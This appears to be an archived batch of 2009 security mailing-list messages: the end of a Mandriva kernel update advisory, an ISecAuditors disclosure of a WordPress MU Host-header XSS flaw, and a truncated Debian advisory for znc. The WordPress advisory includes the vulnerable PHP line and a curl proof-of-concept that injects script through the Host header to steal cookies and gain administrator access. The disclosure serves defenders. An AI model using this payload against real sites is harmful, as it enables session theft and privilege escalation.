 6f2be2f01bacc6be09ec5c3daf0b43b7  2009.0/x86_64/iscsitarget-kernel-desktop-latest-0.4.16-1.20090305.4mdv2009.0.x86_64.rpm
 3073f5b1af7b4526bb2fb7e016dcb894  2009.0/x86_64/iscsitarget-kernel-server-latest-0.4.16-1.20090305.4mdv2009.0.x86_64.rpm
 984a7be93cc5771de58f7b092fac9f10  2009.0/x86_64/kernel-2.6.27.19-1mnb-1-1mnb2.x86_64.rpm
 e70b6dcb75296abb30bc0c9febc2c4f1  2009.0/x86_64/kernel-desktop-2.6.27.19-1mnb-1-1mnb2.x86_64.rpm
 a0d17087516e9ce07c0f346f8825e60d  2009.0/x86_64/kernel-desktop-devel-2.6.27.19-1mnb-1-1mnb2.x86_64.rpm
 5d707b68469c5bf48f4ced31f1f503b1  2009.0/x86_64/kernel-desktop-devel-latest-2.6.27.19-1mnb2.x86_64.rpm
 69ca32bfd5f7680fc2786358c2739830  2009.0/x86_64/kernel-desktop-latest-2.6.27.19-1mnb2.x86_64.rpm
 4af3f33bb4404a4dc0ee83c77a988a42  2009.0/x86_64/kernel-doc-2.6.27.19-1mnb2.x86_64.rpm
 2a64d93ca03b4dbc3914e830a3287a9a  2009.0/x86_64/kernel-server-2.6.27.19-1mnb-1-1mnb2.x86_64.rpm
 7c2d766fc57a49fc582b12254b408644  2009.0/x86_64/kernel-server-devel-2.6.27.19-1mnb-1-1mnb2.x86_64.rpm
 e2d399d9f913fb1c7db976cc43510f66  2009.0/x86_64/kernel-server-devel-latest-2.6.27.19-1mnb2.x86_64.rpm
 36c7fa7b3c2857600f8a279af895aeb5  2009.0/x86_64/kernel-server-latest-2.6.27.19-1mnb2.x86_64.rpm
 5be5348d6c58dcdf2496c63d4f237858  2009.0/x86_64/kernel-source-2.6.27.19-1mnb-1-1mnb2.x86_64.rpm
 1647be8495e0f212287994af9b642e1d  2009.0/x86_64/kernel-source-latest-2.6.27.19-1mnb2.x86_64.rpm
 58f0cdd1bad3d94c7fd3147079a65ab0  2009.0/x86_64/kqemu-kernel-2.6.27.19-desktop-1mnb-1.4.0pre1-0.x86_64.rpm
 a4a909d49a189c71925cd565df246a67  2009.0/x86_64/kqemu-kernel-2.6.27.19-server-1mnb-1.4.0pre1-0.x86_64.rpm
 9c7ed86662c6e2aee405e465a0036617  2009.0/x86_64/kqemu-kernel-desktop-latest-1.4.0pre1-1.20090305.0.x86_64.rpm
 9d7aad5843013d766fd92f310fd50b8a  2009.0/x86_64/kqemu-kernel-server-latest-1.4.0pre1-1.20090305.0.x86_64.rpm
 62c4de8ce043e91e2b02405cd0c0696d  2009.0/x86_64/lirc-kernel-2.6.27.19-desktop-1mnb-0.8.3-4.1mdv2009.0.x86_64.rpm
 761d4252d5a634d7b68484654cc0c6f4  2009.0/x86_64/lirc-kernel-2.6.27.19-server-1mnb-0.8.3-4.1mdv2009.0.x86_64.rpm
 1611d28f62c09178611cbb1f643b8517  2009.0/x86_64/lirc-kernel-desktop-latest-0.8.3-1.20090305.4.1mdv2009.0.x86_64.rpm
 4548201380e59535fad83971e381868c  2009.0/x86_64/lirc-kernel-server-latest-0.8.3-1.20090305.4.1mdv2009.0.x86_64.rpm
 e0fd82beeb5644a8d208639cfe6a1880  2009.0/x86_64/lzma-kernel-2.6.27.19-desktop-1mnb-4.43-24mdv2009.0.x86_64.rpm
 a88de7188ab65a775889adb2d23b080e  2009.0/x86_64/lzma-kernel-2.6.27.19-server-1mnb-4.43-24mdv2009.0.x86_64.rpm
 f337057f4e00042104410725e197303d  2009.0/x86_64/lzma-kernel-desktop-latest-4.43-1.20090305.24mdv2009.0.x86_64.rpm
 020f89819c19da83063218d4766b8413  2009.0/x86_64/lzma-kernel-server-latest-4.43-1.20090305.24mdv2009.0.x86_64.rpm
 1f7cf883e9499420a18ec986cd57aea0  2009.0/x86_64/madwifi-kernel-2.6.27.19-desktop-1mnb-0.9.4-3.r3835mdv2009.0.x86_64.rpm
 b154f305a18dd763738662285f68866d  2009.0/x86_64/madwifi-kernel-2.6.27.19-server-1mnb-0.9.4-3.r3835mdv2009.0.x86_64.rpm
 f61ef782f2c0df742f26cf9b179a37aa  2009.0/x86_64/madwifi-kernel-desktop-latest-0.9.4-1.20090305.3.r3835mdv2009.0.x86_64.rpm
 e2f882b261824131cd96e5f2844f44b7  2009.0/x86_64/madwifi-kernel-server-latest-0.9.4-1.20090305.3.r3835mdv2009.0.x86_64.rpm
 5fcf3d07a37f03fd0e0c323e5beab5d9  2009.0/x86_64/nvidia173-kernel-2.6.27.19-desktop-1mnb-173.14.12-4mdv2009.0.x86_64.rpm
 698a965b2e4962e29d5dd221a5d6e0a3  2009.0/x86_64/nvidia173-kernel-2.6.27.19-server-1mnb-173.14.12-4mdv2009.0.x86_64.rpm
 33872eb702bcd3a66d5ab9a24f2e4e69  2009.0/x86_64/nvidia173-kernel-desktop-latest-173.14.12-1.20090305.4mdv2009.0.x86_64.rpm
 ac6a2f84c8a345d7fbbe808f226d7cba  2009.0/x86_64/nvidia173-kernel-server-latest-173.14.12-1.20090305.4mdv2009.0.x86_64.rpm
 54e35a4e449be53d14def7cce756db43  2009.0/x86_64/nvidia71xx-kernel-2.6.27.19-desktop-1mnb-71.86.06-5mdv2009.0.x86_64.rpm
 2a1d611084255a706d1a1caeff9938da  2009.0/x86_64/nvidia71xx-kernel-2.6.27.19-server-1mnb-71.86.06-5mdv2009.0.x86_64.rpm
 7ad6d2f7d91ba0d2ed17927b46770c46  2009.0/x86_64/nvidia71xx-kernel-desktop-latest-71.86.06-1.20090305.5mdv2009.0.x86_64.rpm
 7dee24375ad2f8658cfc0b991c6438bc  2009.0/x86_64/nvidia71xx-kernel-server-latest-71.86.06-1.20090305.5mdv2009.0.x86_64.rpm
 58296d27a410da24e71c6cfb8b4bbd85  2009.0/x86_64/nvidia96xx-kernel-2.6.27.19-desktop-1mnb-96.43.07-5mdv2009.0.x86_64.rpm
 fce105a626259ab22c9b6de5e7a4d23b  2009.0/x86_64/nvidia96xx-kernel-2.6.27.19-server-1mnb-96.43.07-5mdv2009.0.x86_64.rpm
 bd580579b6ebc027cb19303892c555ec  2009.0/x86_64/nvidia96xx-kernel-desktop-latest-96.43.07-1.20090305.5mdv2009.0.x86_64.rpm
 cc5fb987090ed0454d38e8dc8179362d  2009.0/x86_64/nvidia96xx-kernel-server-latest-96.43.07-1.20090305.5mdv2009.0.x86_64.rpm
 4d853da443ce7f4fc22bcb524d51feb5  2009.0/x86_64/nvidia-current-kernel-2.6.27.19-desktop-1mnb-177.70-2.3mdv2009.0.x86_64.rpm
 6c7bc57f5694553f70acdf49eedbb044  2009.0/x86_64/nvidia-current-kernel-2.6.27.19-server-1mnb-177.70-2.3mdv2009.0.x86_64.rpm
 2ca2fb5dca6ad32e9dbab33259c96a35  2009.0/x86_64/nvidia-current-kernel-desktop-latest-177.70-1.20090305.2.3mdv2009.0.x86_64.rpm
 1aaff751a4d8d04b74c6ec119169ced4  2009.0/x86_64/nvidia-current-kernel-server-latest-177.70-1.20090305.2.3mdv2009.0.x86_64.rpm
 ffad5a84170c25ceb1f8552ef31ac147  2009.0/x86_64/omfs-kernel-2.6.27.19-desktop-1mnb-0.8.0-1mdv2009.0.x86_64.rpm
 89a5474f43a9bde0a59888052aed95b3  2009.0/x86_64/omfs-kernel-2.6.27.19-server-1mnb-0.8.0-1mdv2009.0.x86_64.rpm
 7e3990cf08f238b4473fd4017e9734c1  2009.0/x86_64/omfs-kernel-desktop-latest-0.8.0-1.20090305.1mdv2009.0.x86_64.rpm
 9db64d8523f5d5d2c5d75264503d2e4f  2009.0/x86_64/omfs-kernel-server-latest-0.8.0-1.20090305.1mdv2009.0.x86_64.rpm
 657af4cd858fdd95ae4d33671428ae9c  2009.0/x86_64/omnibook-kernel-2.6.27.19-desktop-1mnb-20080513-0.274.1mdv2009.0.x86_64.rpm
 c42d43d9fd29d0f5135c3bccee290b75  2009.0/x86_64/omnibook-kernel-2.6.27.19-server-1mnb-20080513-0.274.1mdv2009.0.x86_64.rpm
 462d46337719d8f30eca084b132b9104  2009.0/x86_64/omnibook-kernel-desktop-latest-20080513-1.20090305.0.274.1mdv2009.0.x86_64.rpm
 6a83224d8d95cf30298e3f2e50211af6  2009.0/x86_64/omnibook-kernel-server-latest-20080513-1.20090305.0.274.1mdv2009.0.x86_64.rpm
 533cc0bffadf7115347855474fa4554f  2009.0/x86_64/opencbm-kernel-2.6.27.19-desktop-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm
 300287e1b56e25613fd3bee1dd04b6d3  2009.0/x86_64/opencbm-kernel-2.6.27.19-server-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm
 09dafc1813fe981ed66fe16042cd59a2  2009.0/x86_64/opencbm-kernel-desktop-latest-0.4.2a-1.20090305.1mdv2008.1.x86_64.rpm
 0ecba5bbba31aeb31a5089e8eccd8585  2009.0/x86_64/opencbm-kernel-server-latest-0.4.2a-1.20090305.1mdv2008.1.x86_64.rpm
 d27c3bd96bebaf3fb3bf757f8706a136  2009.0/x86_64/ov51x-jpeg-kernel-2.6.27.19-desktop-1mnb-1.5.9-2mdv2009.0.x86_64.rpm
 6963619375ff7d87d71b4623fe9aacb0  2009.0/x86_64/ov51x-jpeg-kernel-2.6.27.19-server-1mnb-1.5.9-2mdv2009.0.x86_64.rpm
 97f770c1d1973765a74116e74f83f76f  2009.0/x86_64/ov51x-jpeg-kernel-desktop-latest-1.5.9-1.20090305.2mdv2009.0.x86_64.rpm
 7962203a76f2f3dfdc902ff9cf7c953f  2009.0/x86_64/ov51x-jpeg-kernel-server-latest-1.5.9-1.20090305.2mdv2009.0.x86_64.rpm
 5a3a9b22256a67fdcaaed7d27aaf247a  2009.0/x86_64/qc-usb-kernel-2.6.27.19-desktop-1mnb-0.6.6-6mdv2009.0.x86_64.rpm
 f9f8597da918bfbb4c345dd72ce699ca  2009.0/x86_64/qc-usb-kernel-2.6.27.19-server-1mnb-0.6.6-6mdv2009.0.x86_64.rpm
 cd6f9bb9d3ea087ea8789fac4cf13774  2009.0/x86_64/qc-usb-kernel-desktop-latest-0.6.6-1.20090305.6mdv2009.0.x86_64.rpm
 2625e03a247632e9ff95bfd9a3844b5d  2009.0/x86_64/qc-usb-kernel-server-latest-0.6.6-1.20090305.6mdv2009.0.x86_64.rpm
 2f364964b9ddf576ef8792b57fb12bb9  2009.0/x86_64/rt2860-kernel-2.6.27.19-desktop-1mnb-1.7.0.0-2mdv2009.0.x86_64.rpm
 e96a4fac685babafd1a85acf0d13b063  2009.0/x86_64/rt2860-kernel-2.6.27.19-server-1mnb-1.7.0.0-2mdv2009.0.x86_64.rpm
 b4e1522684da16352be8120fd4672a41  2009.0/x86_64/rt2860-kernel-desktop-latest-1.7.0.0-1.20090305.2mdv2009.0.x86_64.rpm
 222824ce80aafdc3c3f4c0a0fb4ce656  2009.0/x86_64/rt2860-kernel-server-latest-1.7.0.0-1.20090305.2mdv2009.0.x86_64.rpm
 a55c01c1064c2cb524b2d0a57fad7899  2009.0/x86_64/rt2870-kernel-2.6.27.19-desktop-1mnb-1.3.1.0-2mdv2009.0.x86_64.rpm
 9b347a866df30a8fffb1f60ac97e73bc  2009.0/x86_64/rt2870-kernel-2.6.27.19-server-1mnb-1.3.1.0-2mdv2009.0.x86_64.rpm
 fefdd7241fda64e94d2a82202aef75a0  2009.0/x86_64/rt2870-kernel-desktop-latest-1.3.1.0-1.20090305.2mdv2009.0.x86_64.rpm
 3dc8db9f95fc132980a658a1cd363d06  2009.0/x86_64/rt2870-kernel-server-latest-1.3.1.0-1.20090305.2mdv2009.0.x86_64.rpm
 29c21ad84f0ea16b01c63a06d3b4bd2d  2009.0/x86_64/rtl8187se-kernel-2.6.27.19-desktop-1mnb-1016.20080716-1.1mdv2009.0.x86_64.rpm
 4fa0f9d80f7dc4dcd16d9bc6a72e6335  2009.0/x86_64/rtl8187se-kernel-2.6.27.19-server-1mnb-1016.20080716-1.1mdv2009.0.x86_64.rpm
 9124cb04b513662bb18a8e24c7e876ad  2009.0/x86_64/rtl8187se-kernel-desktop-latest-1016.20080716-1.20090305.1.1mdv2009.0.x86_64.rpm
 da922ca9c28f8c96e98b1a02b45d0001  2009.0/x86_64/rtl8187se-kernel-server-latest-1016.20080716-1.20090305.1.1mdv2009.0.x86_64.rpm
 edac2bbf546e810f7b85aa3cb544da2f  2009.0/x86_64/squashfs-lzma-kernel-2.6.27.19-desktop-1mnb-3.3-5mdv2009.0.x86_64.rpm
 85c6b227048882dc6a6b776a5089f498  2009.0/x86_64/squashfs-lzma-kernel-2.6.27.19-server-1mnb-3.3-5mdv2009.0.x86_64.rpm
 c1104878f9ddc6cbbb5e71d3920a3eb2  2009.0/x86_64/squashfs-lzma-kernel-desktop-latest-3.3-1.20090305.5mdv2009.0.x86_64.rpm
 7c59d3ba6bf8a2ca2cf1479021e7af80  2009.0/x86_64/squashfs-lzma-kernel-server-latest-3.3-1.20090305.5mdv2009.0.x86_64.rpm
 d385f5a1b4370ee2190d72da0f52a009  2009.0/x86_64/tp_smapi-kernel-2.6.27.19-desktop-1mnb-0.37-2mdv2009.0.x86_64.rpm
 3a43418feeeb687ebcce98aad913a50d  2009.0/x86_64/tp_smapi-kernel-2.6.27.19-server-1mnb-0.37-2mdv2009.0.x86_64.rpm
 a1eae4d2c61670a4555a9db1d3c84574  2009.0/x86_64/tp_smapi-kernel-desktop-latest-0.37-1.20090305.2mdv2009.0.x86_64.rpm
 5b98e5133711e05ed82eeacebcd1e489  2009.0/x86_64/tp_smapi-kernel-server-latest-0.37-1.20090305.2mdv2009.0.x86_64.rpm
 a8c0fb243bd0cffa8edaa5c54c3d4066  2009.0/x86_64/vboxadd-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.x86_64.rpm
 41cf8b0414fa7b42196dda9e3e367eb5  2009.0/x86_64/vboxadd-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.x86_64.rpm
 e60e6d30a41fd20bcc34df7c6ff2b0a5  2009.0/x86_64/vboxadd-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.x86_64.rpm
 efad3e1b017464261372a3cdae1fcf0f  2009.0/x86_64/vboxadd-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.x86_64.rpm
 85f212a24b6c3dece94dc706ebe9de6c  2009.0/x86_64/vboxvfs-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.x86_64.rpm
 ea95c63ce5c1aa22ab9d4428191acabd  2009.0/x86_64/vboxvfs-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.x86_64.rpm
 e8d4855313f4b34d6cf66c7174cdbc22  2009.0/x86_64/vboxvfs-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.x86_64.rpm
 49affcf4169fd470773682ba7c29b532  2009.0/x86_64/vboxvfs-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.x86_64.rpm
 decf73786e408c2d3aaf5e269aef3ab3  2009.0/x86_64/vhba-kernel-2.6.27.19-desktop-1mnb-1.0.0-1.svn304.1mdv2009.0.x86_64.rpm
 31ebd1c8bc486c9b6eb29c1eda41cca7  2009.0/x86_64/vhba-kernel-2.6.27.19-server-1mnb-1.0.0-1.svn304.1mdv2009.0.x86_64.rpm
 d68fc51e2613269f22e75a9bd5872e86  2009.0/x86_64/vhba-kernel-desktop-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.x86_64.rpm
 eeb0afd3c1bf0e284aff368914e416a4  2009.0/x86_64/vhba-kernel-server-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.x86_64.rpm
 4f575fa1d0967656870bf461f9d3b067  2009.0/x86_64/virtualbox-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.x86_64.rpm
 d3576bd63a4ef2d3603b4e0fb0fb37a1  2009.0/x86_64/virtualbox-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.x86_64.rpm
 2bd1b82379e3a9d2341b35dde3efdecd  2009.0/x86_64/virtualbox-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.x86_64.rpm
 f8779230ba2a60228184053dcde0a4ba  2009.0/x86_64/virtualbox-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.x86_64.rpm
 18aee2aa6a87006b9229d1e5bca092dd  2009.0/x86_64/vpnclient-kernel-2.6.27.19-desktop-1mnb-4.8.01.0640-3mdv2009.0.x86_64.rpm
 c885a407da7d14613ece90e6d4ea5a7e  2009.0/x86_64/vpnclient-kernel-2.6.27.19-server-1mnb-4.8.01.0640-3mdv2009.0.x86_64.rpm
 614573e35b8982a5073b989cd6669c2a  2009.0/x86_64/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20090305.3mdv2009.0.x86_64.rpm
 5d79336c31a6c1099865ac1e8193c4b7  2009.0/x86_64/vpnclient-kernel-server-latest-4.8.01.0640-1.20090305.3mdv2009.0.x86_64.rpm 
 9449cc7da776f4b2a5f72e386f555cbc  2009.0/SRPMS/kernel-2.6.27.19-1mnb2.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJto5jmqjQ0CJFipgRAliSAJ4/Zrt9grTaDNqeVV34DLo0t0eyxQCbBp2S
5afYb1X9p6Q4ZcMqJVPnPdw(P0
-----END PGP SIGNATURE-----

From - Tue Mar 10 16:51:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068a3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39707-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id B0F66ED8B5
for <lists@securityspace.com>; Tue, 10 Mar 2009 16:41:48 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B9569236FA0; Tue, 10 Mar 2009 13:25:34 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27634 invoked from network); 10 Mar 2009 19:48:57 -0000
Message-ID: <49B6CD06.10201@isecauditors.com>
Date: Tue, 10 Mar 2009 21:26:46 +0100
From: ISecAuditors Security Advisories <advisories@isecauditors.com>
Organization: Internet Security Auditors
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugs@securitytracker.com, news@securiteam.com,
full-disclosure@lists.grok.org.uk, vuln@secunia.com,
packet@packetstormsecurity.org, bugtraq@securityfocus.com
Subject: [ISecAuditors Security Advisories] WordPress MU HTTP Header XSS Vulnerability
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   

============================================INTERNET SECURITY AUDITORS ALERT 2009-004
- Original release date: December 3rd, 2008
- Last revised:  March 10th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.3/10 (CVSS scored)
============================================
I. VULNERABILITY
-------------------------
WordPress MU < 2.7 'Host' HTTP Header Cross Site Scripting (XSS)
Vulnerability

II. BACKGROUND
-------------------------
WordPress MU, or multi-user, allows to run unlimited blogs with a
single install of wordpress. It is most famously used for
WordPress.com where it serves tens of millions of hits on hundreds of
thousands of blogs each day. Also is used in many other sites like
Harvard University and Le Monde.

III. DESCRIPTION
-------------------------
WordPress MU prior to version 2.7 fails to sanitize the Host header
correctly in choose_primary_blog function and is therefore prune to
XSS attacks.
Web Sites running in a name based virtual hosting setup are not
affected while they are not the default virtual host.

IV. PROOF OF CONCEPT
-------------------------
The snippet of vulnerable code:

In wp-includes/wpmu-functions.php, concretly in the function
choose_primary_blog:

1830 function choose_primary_blog() {
1831     global $current_user;
1832     ?>
1833     <table class="form-table">
1834     <tr>
1835         <th scope="row"><?php _e('Primary Blog'); ?></th>
1836         <td>
1837         <?php
1838         $all_blogs = get_blogs_of_user( $current_user->ID );
1839         if( count( $all_blogs ) > 1 ) {
1840             $primary_blog = get_usermeta($current_user->ID,
'primary_blog');
1841             ?>
1842             <select name="primary_blog">
1843                 <?php foreach( (array) $all_blogs as $blog ) { ?>
1844                     <option value='<?php echo $blog->userblog_id
?>'<?php if( $primary_blog == $blog->userblog_id ) echo '
selected="selected"' ?>>http://<?php echo $blog->domain.$blog->path
?></option>
1845                 <?php } ?>
1846             </select>
1847             <?php
1848         } else {
1849             echo $_SERVER['HTTP_HOST']; <- HERE
1850         }
1851         ?>
1852         </td>
1853     </tr>
1854     </table>
1855     <?php
1856 }

The line 1849 contains the affected code "echo $_SERVER['HTTP_HOST'];"
and is possible to inject HTML and script code crafting HTTP Host header:

PoC:
$ curl -H "Cookie: my cookies here" -H "Host: <body
onload=alert(String.fromCharCode(88,83,83))>"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html

The javascript code will be executed in the context of the victim
browser, this can be exploited to steal cookies and escalate
privileges to administrator.

Tested with Wordpress MU 2.6.5, Apache 2.2 and Mozilla Firefox 3.0.6

V. BUSINESS IMPACT
-------------------------
The impact is the attacker can gain administrator privileges on the
application.

VI. SYSTEMS AFFECTED
-------------------------
Versions prior to 2.7 are affected

VII. SOLUTION
-------------------------
Upgrade to version 2.7 of wordpress multi-user. It can be downloaded
from http://mu.wordpress.org

VIII. REFERENCES
-------------------------
http://mu.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
December  03, 2008: Initial release
March     02, 2009: More details added

XI. DISCLOSURE TIMELINE
-------------------------
December  03, 2008: Vendor contacted
December  03, 2008: MU trunk code fixed
January   28, 2008: WordPress MU 2.7 released
March     10, 2009: Vulnerability published by
                    Internet Security Auditors (www.isecauditors.com)

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

From - Tue Mar 10 17:01:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068a4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39708-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C6443ED5DA
for <lists@securityspace.com>; Tue, 10 Mar 2009 16:52:09 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 6F75B236FB1; Tue, 10 Mar 2009 13:25:48 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27659 invoked from network); 10 Mar 2009 19:50:19 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <fw@deneb.enyo.de>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client!2.9.189.167> <helo=mail.enyo.de> <from=fw@deneb.enyo.de> <to�bian-security-announce@lists.debian.org>, rate: -6.1
From: Florian Weimer <fw@deneb.enyo.de>
Date: Tue, 10 Mar 2009 21:23:49 +0100
Message-ID: <87eix5ktyi.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1735-1] New znc packages fix privilege escalation
Priority: urgent
Resent-Message-ID: <OoYMMhkhJ8H.A.97.kxstJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Tue, 10 Mar 2009 20:24:04 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1735-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
March 10, 2009                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : znc
Vulnerability  : missing input sanitization
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2009-0759
Debian Bug     : 516950

It was discovered that znc, an IRC proxy/bouncer, does not properly
sanitize input contained in configuration change requests to the
webadmin interface.  This allows authenticated users to elevate their
privileges and indirectly execute arbitrary commands (CVE-2009-0759).

For the old stable distribution (etch), this problem has been fixed in
version 0.045-3+etch2.

For the stable distribution (lenny), this problem has been fixed in
version 0.058-2+lenny1.

For the unstable distribution (sid), this problem has been fixed in
version 0.066-1.

We recommend that you upgrade your znc packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045.orig.tar.gz
    Size/MD5 checksum:   204863 9a514b125b7514811fd03befa73cce77
  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2.dsc
    Size/MD5 checksum:      962 1962af4c56b4c4c169832249d6b99f30
  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2.diff.gz
    Size/MD5 checksum:    12817 c254e989604122fb7267a0fafeddfd95

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_alpha.deb
    Size/MD5 checksum:   859792 f154f471d3b0d42d7b7cfe8eebaf3134

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_amd64.deb
    Size/MD5 checksum:   793694 80c9126c518abe062265cee5d94ca6f1

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_hppa.deb
    Size/MD5 checksum:   857356 04a64d64b5a4582fcd7db3bef32822ec

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_i386.deb
    Size/MD5 checksum:   806592 99b63e880bbba2841f30ed006fbe2364

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_ia64.deb
    Size/MD5 checksum:   957620 061cfe882476dc4ad55caf16ec8c7af8

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_mips.deb
    Size/MD5 checksum:   713450 625f8ed77be76269bd78f4414ed55a61

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_mipsel.deb
    Size/MD5 checksum:   710332 5b07981be622bf78839d2376af142e3d

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_powerpc.deb
    Size/MD5 checksum:   789838 5c75fc8a345a20c6b6e39e2eb97cd004

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_s390.deb
    Size/MD5 checksum:   730066 514965b8fa4913d2e1ff13630bd5957a

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_sparc.deb
    Size/MD5 checksum:   747502 6b72758d93bb4ddc392ef6cfa119a5c2


Debian GNU/Linux 4.0 alias lenny
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1.dsc
